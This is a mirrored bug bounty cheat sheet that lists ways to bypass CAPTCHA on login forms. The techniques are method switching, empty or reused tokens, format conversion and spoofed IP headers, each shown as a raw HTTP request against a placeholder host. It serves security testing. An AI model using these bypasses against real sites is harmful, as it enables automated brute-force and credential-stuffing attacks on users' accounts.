daffainfo
/
AllAboutBugBounty
mirror of https://github.com/daffainfo/AllAboutBugBounty.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
AllAboutBugBounty/BypassCaptcha.md

1.1 KiB
Raw Blame History

Bypass Captcha

  1. Try changing the request method, for example POST to GET
POST / HTTP 1.1
Host: target.com
[...]

_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123

Change the method to GET

GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1
Host: target.com
[...]
  1. Try remove the value of the captcha parameter
POST / HTTP 1.1
Host: target.com
[...]

_RequestVerificationToken=&_Username=daffa&_Password=test123
  1. Try reuse old captcha token
POST / HTTP 1.1
Host: target.com
[...]

_RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123
  1. Convert JSON data to normal request parameter
POST / HTTP 1.1
Host: target.com
[...]

{"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"}

Convert to normal request

POST / HTTP 1.1
Host: target.com
[...]

_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
  1. Try custom header to bypass captcha
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1